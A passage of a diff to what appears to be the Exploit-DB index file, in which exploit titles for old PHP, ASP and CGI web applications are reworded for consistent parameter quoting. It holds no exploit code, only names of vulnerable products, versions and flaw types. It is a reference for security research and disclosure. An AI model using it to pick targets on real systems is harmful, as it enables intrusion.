Vulnerabilities",2012-03-30,waraxe,php,webapps,0 -18682,platforms/php/webapps/18682.txt,"ArticleSetup - Multiple Persistence Cross-Site Scripting / SQL Injection",2012-03-30,"SecPod Research",php,webapps,0 +18682,platforms/php/webapps/18682.txt,"ArticleSetup - Multiple Persistence Cross-Site Scripting / SQL Injections",2012-03-30,"SecPod Research",php,webapps,0 18685,platforms/php/webapps/18685.txt,"dalbum 144 build 174 - Cross-Site Request Forgery",2012-03-30,"Ahmed Elhady Mohamed",php,webapps,0 18686,platforms/php/webapps/18686.txt,"SyndeoCMS 3.0.01 - Persistent Cross-Site Scripting",2012-03-30,"Ivano Binetti",php,webapps,0 18687,platforms/php/webapps/18687.txt,"Landshop 0.9.2 - Multiple Web Vulnerabilities",2012-03-31,Vulnerability-Lab,php,webapps,0 @@ -25820,7 +25831,7 @@ id,file,description,date,author,platform,type,port 18770,platforms/php/webapps/18770.txt,"vtiger CRM 5.1.0 - Local File Inclusion",2012-04-22,Pi3rrot,php,webapps,0 18773,platforms/php/webapps/18773.txt,"exponentcms 2.0.5 - Multiple Vulnerabilities",2012-04-23,"Onur Yılmaz",php,webapps,0 18775,platforms/php/webapps/18775.php,"WebCalendar 1.2.4 - Remote Code Execution",2012-04-23,EgiX,php,webapps,0 -18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 - 'index.php p Parameter' SQL Injection",2012-04-24,G13,php,webapps,0 +18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 - 'index.php' 'p' Parameter SQL Injection",2012-04-24,G13,php,webapps,0 18782,platforms/php/webapps/18782.txt,"piwigo 2.3.3 - Multiple Vulnerabilities",2012-04-25,"High-Tech Bridge SA",php,webapps,0 18788,platforms/php/webapps/18788.txt,"PHP Volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0 18787,platforms/php/webapps/18787.txt,"WordPress Plugin Zingiri Web Shop 2.4.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0 @@ -26008,7 +26019,7 @@ id,file,description,date,author,platform,type,port 19864,platforms/php/webapps/19864.txt,"VamCart 0.9 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19865,platforms/php/webapps/19865.txt,"PBBoard 2.1.4 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19898,platforms/php/webapps/19898.txt,"Forum Oxalis 0.1.2 - SQL Injection",2012-07-17,"Jean Pascal Pereira",php,webapps,0 -20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - 'products_map.php symb Parameter' Cross-Site Scripting",2012-07-21,muts,php,webapps,0 +20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - 'products_map.php' 'symb' Parameter Cross-Site Scripting",2012-07-21,muts,php,webapps,0 19927,platforms/php/webapps/19927.html,"Nwahy Articles 2.2 - Cross-Site Request Forgery (Add Admin)",2012-07-18,DaOne,php,webapps,0 19985,platforms/php/webapps/19985.txt,"iBoutique 4.0 - 'key' Parameter SQL Injection",2012-07-20,"SecPod Research",php,webapps,0 20011,platforms/windows/webapps/20011.js,"SolarWinds Orion Network Performance Monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0 @@ -26016,7 +26027,7 @@ id,file,description,date,author,platform,type,port 20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - 'statusFilter.php' q Parameter SQL Injection",2012-07-22,muts,php,webapps,0 20035,platforms/asp/webapps/20035.js,"ipswitch whatsup gold 15.02 - Persistent Cross-Site Scripting / Blind SQL Injection / Remote Code Execution",2012-07-22,muts,asp,webapps,0 20037,platforms/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel - SQL Root Password Disclosure",2012-07-23,Ciph3r,linux,webapps,0 -20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - 'blocked.php id Parameter' Blind SQL Injection",2012-07-23,muts,linux,webapps,0 +20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - 'blocked.php' 'id' Parameter Blind SQL Injection",2012-07-23,muts,linux,webapps,0 20044,platforms/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 - Blind SQL Injection Backdoor via MySQL Triggers",2012-07-23,muts,php,webapps,0 20055,platforms/php/webapps/20055.txt,"MySQL Squid Access Report 2.1.4 - HTML Injection",2012-07-23,"Daniel Godoy",php,webapps,0 20062,platforms/php/webapps/20062.py,"Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection",2012-07-23,muts,php,webapps,0 @@ -26024,7 +26035,7 @@ id,file,description,date,author,platform,type,port 20083,platforms/php/webapps/20083.txt,"WordPress Plugin Front End Upload 0.5.4.4 - Arbitrary '.PHP' File Upload",2012-07-24,"Chris Kellum",php,webapps,0 20087,platforms/php/webapps/20087.py,"Zabbix 2.0.1 - Session Extractor",2012-07-24,muts,php,webapps,0 20111,platforms/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload (Metasploit)",2012-07-27,Metasploit,php,webapps,0 -20123,platforms/php/webapps/20123.py,"Symantec Web Gateway 5.0.3.18 - 'deptUploads_data.php groupid Parameter' Blind SQL Injection",2012-07-30,Kc57,php,webapps,0 +20123,platforms/php/webapps/20123.py,"Symantec Web Gateway 5.0.3.18 - 'deptUploads_data.php' 'groupid' Parameter Blind SQL Injection",2012-07-30,Kc57,php,webapps,0 20124,platforms/windows/webapps/20124.txt,"Dr. Web Control Center 6.00.3.201111300 - Cross-Site Scripting",2012-07-31,"Oliver Karow",windows,webapps,0 20158,platforms/php/webapps/20158.txt,"PHP-Nuke 1.0/2.5 - Administrative Privileges",2000-08-21,bruj0,php,webapps,0 20166,platforms/php/webapps/20166.txt,"Joomla! Component 'com_niceajaxpoll' 1.3.0 - SQL Injection",2012-08-01,NLSecurity,php,webapps,0 @@ -26047,7 +26058,7 @@ id,file,description,date,author,platform,type,port 20344,platforms/php/webapps/20344.php,"AraDown - Blind SQL Injection",2012-08-08,G-B,php,webapps,0 20345,platforms/php/webapps/20345.txt,"iauto mobile Application 2012 - Multiple Vulnerabilities",2012-08-08,Vulnerability-Lab,php,webapps,0 20346,platforms/php/webapps/20346.txt,"Inout Mobile Webmail APP - Persistent Cross-Site Scripting",2012-08-08,Vulnerability-Lab,php,webapps,0 -20347,platforms/php/webapps/20347.txt,"Openconstructor CMS 3.12.0 - 'id' Parameter Multiple SQL Injection",2012-08-08,"Lorenzo Cantoni",php,webapps,0 +20347,platforms/php/webapps/20347.txt,"Openconstructor CMS 3.12.0 - 'id' Parameter Multiple SQL Injections",2012-08-08,"Lorenzo Cantoni",php,webapps,0 20348,platforms/windows/webapps/20348.py,"Axigen Mail Server 8.0.1 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20349,platforms/windows/webapps/20349.py,"emailarchitect enterprise email server 10.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20350,platforms/windows/webapps/20350.py,"escon supportportal pro 3.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 @@ -26115,7 +26126,7 @@ id,file,description,date,author,platform,type,port 20712,platforms/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance - learn-msg.cgi Command Injection (Metasploit)",2012-08-22,Metasploit,cgi,webapps,0 20671,platforms/php/webapps/20671.html,"PG Portal Pro - Cross-Site Request Forgery",2012-08-20,Noxious,php,webapps,0 20672,platforms/php/webapps/20672.py,"Hivemail Webmail - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0 -20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 - 'index.php id Parameter' SQL Injection",2012-08-20,DaOne,php,webapps,0 +20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 - 'index.php' 'id' Parameter SQL Injection",2012-08-20,DaOne,php,webapps,0 20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary '.PHP' File Upload (Metasploit)",2012-08-22,Metasploit,php,webapps,0 20675,platforms/php/webapps/20675.py,"uebimiau webmail 2.7.2 - Persistent Cross-Site Scripting",2012-08-20,"Shai rod",php,webapps,0 20677,platforms/windows/webapps/20677.txt,"IOServer 1.0.18.0 - Directory Traversal",2012-08-20,hinge,windows,webapps,0 @@ -26159,7 +26170,7 @@ id,file,description,date,author,platform,type,port 20995,platforms/php/webapps/20995.txt,"Cobalt Qube Webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0 20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 - File Disclosure",2001-07-06,"karol _",php,webapps,0 21005,platforms/php/webapps/21005.txt,"Admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0 -21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php id Parameter' Blind SQL Injection",2012-09-02,DaOne,php,webapps,0 +21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php' 'id' Parameter Blind SQL Injection",2012-09-02,DaOne,php,webapps,0 21022,platforms/php/webapps/21022.txt,"PHPLib Team PHPLIB 7.2 - Remote Script Execution",2001-07-21,"giancarlo pinerolo",php,webapps,0 21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0 21033,platforms/hardware/webapps/21033.txt,"Sitecom Home Storage Center - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0 @@ -26172,7 +26183,7 @@ id,file,description,date,author,platform,type,port 21056,platforms/php/webapps/21056.txt,"Group Office Calendar - 'calendar/json.php' SQL Injection",2012-09-04,"Chris Cooper",php,webapps,0 21065,platforms/php/webapps/21065.pl,"phpBB 1.x - Page Header Arbitrary Command Execution",2001-07-31,UnderSpell,php,webapps,0 21079,platforms/php/webapps/21079.rb,"MobileCartly 1.0 - Arbitrary File Creation (Metasploit)",2012-09-05,Metasploit,php,webapps,0 -21081,platforms/hardware/webapps/21081.txt,"QNAP Turbo NAS TS-1279U-RP - Multiple Path Injection",2012-09-05,"Andrea Fabrizi",hardware,webapps,0 +21081,platforms/hardware/webapps/21081.txt,"QNAP Turbo NAS TS-1279U-RP - Multiple Path Injections",2012-09-05,"Andrea Fabrizi",hardware,webapps,0 21082,platforms/multiple/webapps/21082.txt,"novell sentinel log manager 1.2.0.1 - Directory Traversal",2011-12-18,"Andrea Fabrizi",multiple,webapps,0 21084,platforms/php/webapps/21084.txt,"ES Job Search Engine 3.0 - SQL Injection",2012-09-05,Vulnerability-Lab,php,webapps,0 21085,platforms/asp/webapps/21085.txt,"Ektron CMS 8.5.0 - Multiple Vulnerabilities",2012-09-05,"Sense of Security",asp,webapps,0 @@ -26357,7 +26368,7 @@ id,file,description,date,author,platform,type,port 21779,platforms/php/webapps/21779.txt,"WoltLab Burning Board 2.0 - SQL Injection",2002-09-09,Cano2,php,webapps,0 21780,platforms/php/webapps/21780.txt,"phpGB 1.1 - HTML Injection",2002-09-09,ppp-design,php,webapps,0 21783,platforms/php/webapps/21783.txt,"PHPGB 1.1/1.2 - PHP Code Injection",2002-09-09,ppp-design,php,webapps,0 -21786,platforms/php/webapps/21786.php,"Blog Mod 0.1.9 - 'index.php month Parameter' SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps,0 +21786,platforms/php/webapps/21786.php,"Blog Mod 0.1.9 - 'index.php' 'month' Parameter SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps,0 21802,platforms/cgi/webapps/21802.txt,"Lycos HTMLGear - guestGear CSS HTML Injection",2002-09-17,"Matthew Murphy",cgi,webapps,0 21809,platforms/php/webapps/21809.txt,"Web Help Desk by SolarWinds - Persistent Cross-Site Scripting",2012-10-08,loneferret,php,webapps,0 21811,platforms/php/webapps/21811.txt,"SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities",2002-09-19,"DarC KonQuest",php,webapps,0 @@ -26401,7 +26412,7 @@ id,file,description,date,author,platform,type,port 21921,platforms/php/webapps/21921.txt,"VBZoom 1.0 - Arbitrary File Upload",2002-10-09,hish,php,webapps,0 21924,platforms/asp/webapps/21924.txt,"SurfControl SuperScout Email Filter 3.5 - MsgError.asp Cross-Site Scripting",2002-10-08,ken@FTU,asp,webapps,0 21925,platforms/asp/webapps/21925.txt,"SurfControl SuperScout Email Filter 3.5 - User Credential Disclosure",2002-10-08,ken@FTU,asp,webapps,0 -21926,platforms/cgi/webapps/21926.txt,"Authoria HR Suite - AthCGI.exe Cross-Site Scripting",2002-10-09,Max,cgi,webapps,0 +21926,platforms/cgi/webapps/21926.txt,"Authoria HR Suite - 'AthCGI.exe' Cross-Site Scripting",2002-10-09,Max,cgi,webapps,0 21930,platforms/php/webapps/21930.txt,"PHPReactor 1.2.7 pl1 - browse.php Cross-Site Scripting",2002-10-10,"Arab VieruZ",php,webapps,0 21929,platforms/php/webapps/21929.rb,"Project Pier - Arbitrary File Upload (Metasploit)",2012-10-16,Metasploit,php,webapps,0 21931,platforms/php/webapps/21931.txt,"PHPBBMod 1.3.3 - PHPInfo Information Disclosure",2002-10-10,"Roland Verlander",php,webapps,0 @@ -26425,7 +26436,7 @@ id,file,description,date,author,platform,type,port 21990,platforms/php/webapps/21990.txt,"airVisionNVR 1.1.13 - readfile() Disclosure / SQL Injection",2012-10-15,pennyGrit,php,webapps,0 21992,platforms/hardware/webapps/21992.txt,"BigPond 3G21WB - Multiple Vulnerabilities",2012-10-15,"Roberto Paleari",hardware,webapps,0 21995,platforms/cgi/webapps/21995.txt,"CuteCast 1.2 - User Credential Disclosure",2002-11-07,Zero-X,cgi,webapps,0 -22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 - 'albums.php album Parameter' SQL Injection",2012-10-16,Zixem,php,webapps,0 +22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 - 'albums.php' 'album' Parameter SQL Injection",2012-10-16,Zixem,php,webapps,0 22004,platforms/php/webapps/22004.txt,"Joomla! Component 'com_icagenda' - 'id' Parameter Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0 22005,platforms/hardware/webapps/22005.txt,"Visual Tools DVR3.0.6.16_ vx series 4.2.19.2 - Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps,0 22009,platforms/php/webapps/22009.txt,"EZ Systems HTTPBench 1.1 - Information Disclosure",2002-11-11,"Tacettin Karadeniz",php,webapps,0 @@ -26681,8 +26692,8 @@ id,file,description,date,author,platform,type,port 22675,platforms/php/webapps/22675.txt,"Geeklog 1.3.x - Authenticated SQL Injection",2003-05-29,pokleyzz,php,webapps,0 22684,platforms/php/webapps/22684.txt,"Eventy CMS 1.8 Plus - Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,php,webapps,0 22687,platforms/php/webapps/22687.pl,"Webfroot Shoutbox 2.32 - Remote Command Execution",2003-05-29,pokleyzz,php,webapps,0 -22688,platforms/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 - nph-psf.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 -22689,platforms/cgi/webapps/22689.txt,"M-TECH P-Synch 6.2.5 - nph-psa.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 +22688,platforms/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 - 'nph-psf.exe' 'css' Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 +22689,platforms/cgi/webapps/22689.txt,"M-TECH P-Synch 6.2.5 - 'nph-psa.exe' 'css' Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 22692,platforms/cgi/webapps/22692.txt,"Zeus Web Server 4.x - Admin Interface VS_Diag.cgi Cross-Site Scripting",2003-05-29,"Hugo Vazquez",cgi,webapps,0 22693,platforms/php/webapps/22693.txt,"cPanel 5/6 / Formail-Clone - E-Mail Restriction Bypass",2003-05-30,"Chad C. Keep",php,webapps,0 22697,platforms/asp/webapps/22697.asp,"iisCart2000 - Arbitrary File Upload",2003-05-31,Bosen,asp,webapps,0 @@ -26693,7 +26704,7 @@ id,file,description,date,author,platform,type,port 22708,platforms/php/webapps/22708.txt,"dotProject 2.1.6 - Remote File Inclusion",2012-11-14,dun,php,webapps,0 22709,platforms/php/webapps/22709.txt,"Narcissus - Remote Command Execution",2012-11-14,dun,php,webapps,0 22713,platforms/php/webapps/22713.txt,"MYRE Realty Manager - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 -22710,platforms/php/webapps/22710.txt,"friendsinwar FAQ Manager - SQL Injection (Authentication Bypass)",2012-11-14,d3b4g,php,webapps,0 +22710,platforms/php/webapps/22710.txt,"friendsinwar FAQ Manager - SQL Injection / Authentication Bypass",2012-11-14,d3b4g,php,webapps,0 22711,platforms/php/webapps/22711.txt,"Myrephp Business Directory - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 22712,platforms/php/webapps/22712.txt,"MYREphp Vacation Rental Software - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 22715,platforms/php/webapps/22715.txt,"WebChat 2.0 - users.php Database 'Username' Disclosure",2003-06-02,"Rynho Zeros Web",php,webapps,0 @@ -26719,7 +26730,7 @@ id,file,description,date,author,platform,type,port 22829,platforms/php/webapps/22829.txt,"weBid 1.0.5 - Directory Traversal",2012-11-19,loneferret,php,webapps,80 22767,platforms/php/webapps/22767.txt,"PostNuke 0.723 - user.php UNAME Cross-Site Scripting",2003-06-13,"David F. Madrid",php,webapps,0 22770,platforms/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 - Cross-Site Scripting",2003-06-12,badpack3t,cgi,webapps,0 -22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager - 'view_faq.php question Parameter' SQL Injection",2012-11-16,unsuprise,php,webapps,0 +22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager - 'view_faq.php' 'question' Parameter SQL Injection",2012-11-16,unsuprise,php,webapps,0 22772,platforms/cgi/webapps/22772.txt,"Infinity CGI Exploit Scanner 3.11 - Remote Command Execution",2003-06-12,badpack3t,cgi,webapps,0 22776,platforms/php/webapps/22776.txt,"PMachine 2.2.1 - Lib.Inc.php Remote File Inclusion Command Execution",2003-06-15,frog,php,webapps,0 22777,platforms/cgi/webapps/22777.txt,"LedNews 0.7 Post Script - Code Injection",2003-06-16,"gilbert vilvoorde",cgi,webapps,0 @@ -26794,7 +26805,7 @@ id,file,description,date,author,platform,type,port 23014,platforms/php/webapps/23014.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module - 'day' Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23015,platforms/php/webapps/23015.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 fatcat Module - fatcat_id Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23016,platforms/php/webapps/23016.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 pagemaster Module - PAGE_id Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -22936,platforms/php/webapps/22936.txt,"SmartCMS - 'index.php idx Parameter' SQL Injection",2012-11-26,NoGe,php,webapps,0 +22936,platforms/php/webapps/22936.txt,"SmartCMS - 'index.php' 'idx' Parameter SQL Injection",2012-11-26,NoGe,php,webapps,0 22937,platforms/php/webapps/22937.txt,"PRADO PHP Framework 3.2.0 - Arbitrary File Read",2012-11-26,LiquidWorm,php,webapps,0 22960,platforms/php/webapps/22960.txt,"PBLang 4.0/4.56 Bulletin Board System - IMG Tag HTML Injection",2003-07-28,"Quan Van Truong",php,webapps,0 22972,platforms/windows/webapps/22972.txt,"gleamtech filevista/fileultimate 4.6 - Directory Traversal",2012-11-28,"Soroush Dalili",windows,webapps,0 @@ -26817,7 +26828,7 @@ id,file,description,date,author,platform,type,port 23026,platforms/php/webapps/23026.txt,"Xoops 1.0/1.3.x - BBCode HTML Injection",2003-08-13,frog,php,webapps,0 23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x - HTMLtags.php Local File Inclusion",2003-08-13,"Virginity Security",php,webapps,0 23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 - 'id' Parameter SQL Injection",2012-11-30,"Yakir Wizman",php,webapps,0 -23029,platforms/php/webapps/23029.txt,"SmartCMS - 'index.php menuitem Parameter' SQL Injection / Cross-Site Scripting",2012-11-30,"Yakir Wizman",php,webapps,0 +23029,platforms/php/webapps/23029.txt,"SmartCMS - 'index.php' 'menuitem' Parameter SQL Injection / Cross-Site Scripting",2012-11-30,"Yakir Wizman",php,webapps,0 23032,platforms/asp/webapps/23032.txt,"Clickcess ChitChat.NET - name Cross-Site Scripting",2003-08-13,G00db0y,asp,webapps,0 23033,platforms/asp/webapps/23033.txt,"Clickcess ChitChat.NET - topic title Cross-Site Scripting",2003-08-13,G00db0y,asp,webapps,0 23031,platforms/php/webapps/23031.txt,"Silverstripe CMS 3.0.2 - Multiple Vulnerabilities",2012-11-30,"Sense of Security",php,webapps,0 @@ -26941,7 +26952,7 @@ id,file,description,date,author,platform,type,port 23425,platforms/php/webapps/23425.txt,"MyBB User Profile Skype ID Plugin 1.0 - Persistent Cross-Site Scripting",2012-12-16,limb0,php,webapps,0 23428,platforms/php/webapps/23428.html,"Mambo 4.5 Server - user.php Script Unauthorized Access",2003-12-10,frog,php,webapps,0 23429,platforms/php/webapps/23429.txt,"Mambo Open Source 4.0.14 Server - SQL Injection",2003-12-10,"Chintan Trivedi",php,webapps,0 -23430,platforms/php/webapps/23430.txt,"Mambo Open Source 4.0.14 - 'PollBooth.php' Multiple SQL Injection",2003-12-10,frog,php,webapps,0 +23430,platforms/php/webapps/23430.txt,"Mambo Open Source 4.0.14 - 'PollBooth.php' Multiple SQL Injections",2003-12-10,frog,php,webapps,0 23432,platforms/cgi/webapps/23432.txt,"RemotelyAnywhere - Default.HTML Logout Message Injection",2003-12-11,"Oliver Karow",cgi,webapps,0 23434,platforms/php/webapps/23434.pl,"osCommerce 2.2 - SQL Injection",2003-12-13,JeiAr,php,webapps,0 23440,platforms/asp/webapps/23440.txt,"elektropost episerver 3/4 - Multiple Vulnerabilities",2003-12-15,babbelbubbel,asp,webapps,0 @@ -27020,7 +27031,7 @@ id,file,description,date,author,platform,type,port 23621,platforms/php/webapps/23621.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script admin.php Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0 23623,platforms/php/webapps/23623.txt,"City Directory Review and Rating Script - 'search.php' SQL Injection",2012-12-24,3spi0n,php,webapps,0 23624,platforms/php/webapps/23624.txt,"MyBB HM My Country Flags - SQL Injection",2012-12-24,JoinSe7en,php,webapps,0 -23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin - 'index.php id Parameter' SQL Injection",2012-12-24,Red_Hat,php,webapps,0 +23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin - 'index.php' 'id' Parameter SQL Injection",2012-12-24,Red_Hat,php,webapps,0 23687,platforms/php/webapps/23687.txt,"Macallan Mail Solution Macallan Mail Solution 2.8.4.6 (Build 260) - Web Interface Authentication Bypass",2004-02-12,"Ziv Kamir",php,webapps,0 23688,platforms/php/webapps/23688.txt,"vBulletin 1.0/1.1/2.0.x/2.2.x - Cross-Site Scripting",2004-02-12,"Jamie Fisher",php,webapps,0 23635,platforms/asp/webapps/23635.txt,"Niti Telecom Caravan Business Server 2.00-03D - Directory Traversal",2004-02-02,dr_insane,asp,webapps,0 @@ -27115,8 +27126,8 @@ id,file,description,date,author,platform,type,port 23834,platforms/php/webapps/23834.txt,"Mambo Open Source 4.5 - 'index.php' SQL Injection",2004-03-16,JeiAr,php,webapps,0 23835,platforms/php/webapps/23835.txt,"PHP-Nuke 6.x/7.0/7.1 - Image Tag Admin Command Execution",2004-03-16,"Janek Vind",php,webapps,0 23843,platforms/php/webapps/23843.txt,"Belchior Foundry VCard 2.8 - Authentication Bypass",2004-03-17,"saudi linux",php,webapps,0 -23844,platforms/php/webapps/23844.txt,"PHP-Nuke Error Manager Module 2.1 - error.php language Variable Full Path Disclosure",2004-03-18,"Janek Vind",php,webapps,0 -23845,platforms/php/webapps/23845.txt,"PHP-Nuke Error Manager Module 2.1 - error.php Multiple Variables Cross-Site Scripting",2004-03-18,"Janek Vind",php,webapps,0 +23844,platforms/php/webapps/23844.txt,"PHP-Nuke Error Manager Module 2.1 - 'error.php' 'language' Parameter Full Path Disclosure",2004-03-18,"Janek Vind",php,webapps,0 +23845,platforms/php/webapps/23845.txt,"PHP-Nuke Error Manager Module 2.1 - 'error.php' Multiple Parameters Cross-Site Scripting",2004-03-18,"Janek Vind",php,webapps,0 23851,platforms/asp/webapps/23851.txt,"Expinion.net Member Management System 2.1 - 'news_view.asp' ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23852,platforms/asp/webapps/23852.txt,"Expinion.net Member Management System 2.1 - resend.asp ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23853,platforms/asp/webapps/23853.txt,"Expinion.net Member Management System 2.1 - error.asp err Parameter Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 @@ -27303,7 +27314,7 @@ id,file,description,date,author,platform,type,port 24212,platforms/php/webapps/24212.txt,"Pivot 1.0 - 'module_db.php' Remote File Inclusion",2004-06-15,loofus,php,webapps,0 24214,platforms/asp/webapps/24214.txt,"Web Wiz Forums 7.x - Registration_Rules.asp Cross-Site Scripting",2004-06-15,"Ferruh Mavituna",asp,webapps,0 24215,platforms/php/webapps/24215.txt,"phpHeaven phpMyChat 0.14.5 - usersL.php3 Multiple Parameter SQL Injection",2004-06-15,HEX,php,webapps,0 -24216,platforms/php/webapps/24216.html,"phpHeaven phpMyChat 0.14.5 - edituser.php3 do_not_login Variable Authentication Bypass",2004-06-15,HEX,php,webapps,0 +24216,platforms/php/webapps/24216.html,"phpHeaven phpMyChat 0.14.5 - 'edituser.php3' 'do_not_login' Parameter Authentication Bypass",2004-06-15,HEX,php,webapps,0 24217,platforms/php/webapps/24217.txt,"phpHeaven phpMyChat 0.14.5 - admin.php3 Arbitrary File Access",2004-06-15,HEX,php,webapps,0 24225,platforms/php/webapps/24225.php,"osTicket STS 1.2 - Attachment Remote Command Execution",2004-06-21,"Guy Pearce",php,webapps,0 24227,platforms/php/webapps/24227.txt,"SqWebMail 4.0.4.20040524 - Email Header HTML Injection",2004-06-21,"Luca Legato",php,webapps,0 @@ -27329,13 +27340,13 @@ id,file,description,date,author,platform,type,port 24257,platforms/php/webapps/24257.txt,"Jaws 0.2/0.3 - 'action' Parameter Cross-Site Scripting",2004-07-06,"Fernando Quintero",php,webapps,0 24260,platforms/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 - comersus_gatewayPayPal.asp Price Manipulation",2004-07-07,"Thomas Ryan",asp,webapps,0 24261,platforms/asp/webapps/24261.txt,"Comersus Open Technologies Comersus 5.0 - comersus_message.asp Cross-Site Scripting",2004-07-07,"Thomas Ryan",asp,webapps,0 -24269,platforms/php/webapps/24269.txt,"NConf 1.3 - 'detail.php detail_admin_items.php id Parameter' SQL Injection",2013-01-21,haidao,php,webapps,0 +24269,platforms/php/webapps/24269.txt,"NConf 1.3 - 'detail.php' 'detail_admin_items.php' 'id' Parameter SQL Injection",2013-01-21,haidao,php,webapps,0 24270,platforms/php/webapps/24270.txt,"NConf 1.3 - Arbitrary File Creation",2013-01-21,haidao,php,webapps,0 24357,platforms/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 - Blog_Exec.php Cross-Site Scripting",2004-08-07,"befcake beefy",php,webapps,0 24274,platforms/php/webapps/24274.pl,"phpBB 2.0.x - viewtopic.php PHP Script Injection",2004-07-12,"sasan hezarkhani",php,webapps,0 24279,platforms/php/webapps/24279.txt,"Moodle Help Script 1.x - Cross-Site Scripting",2004-07-13,morpheus[bd],php,webapps,0 24284,platforms/cgi/webapps/24284.txt,"Gattaca Server 2003 - Null Byte Full Path Disclosure",2004-07-15,dr_insane,cgi,webapps,0 -24285,platforms/cgi/webapps/24285.txt,"Gattaca Server 2003 - Language Variable Path Exposure",2004-07-15,dr_insane,cgi,webapps,0 +24285,platforms/cgi/webapps/24285.txt,"Gattaca Server 2003 - 'Language' Parameter Path Exposure",2004-07-15,dr_insane,cgi,webapps,0 24286,platforms/cgi/webapps/24286.txt,"Gattaca Server 2003 - Cross-Site Scripting",2004-07-15,dr_insane,cgi,webapps,0 24287,platforms/cgi/webapps/24287.txt,"BoardPower Forum - ICQ.cgi Cross-Site Scripting",2004-07-15,"Alexander Antipov",cgi,webapps,0 24289,platforms/php/webapps/24289.c,"Artmedic Webdesign Kleinanzeigen Script - File Inclusion",2004-07-19,"Adam Simuntis",php,webapps,0 @@ -27362,7 +27373,7 @@ id,file,description,date,author,platform,type,port 24317,platforms/asp/webapps/24317.txt,"XLineSoft ASPRunner 1.0/2.x - Database Direct Request Information Disclosure",2004-07-26,"Ferruh Mavituna",asp,webapps,0 24320,platforms/multiple/webapps/24320.py,"SQLiteManager 1.2.4 - Remote PHP Code Injection",2013-01-24,RealGame,multiple,webapps,0 24324,platforms/php/webapps/24324.txt,"PostNuke 0.72/0.75 Reviews Module - Cross-Site Scripting",2004-07-26,DarkBicho,php,webapps,0 -24329,platforms/php/webapps/24329.txt,"AntiBoard 0.6/0.7 - 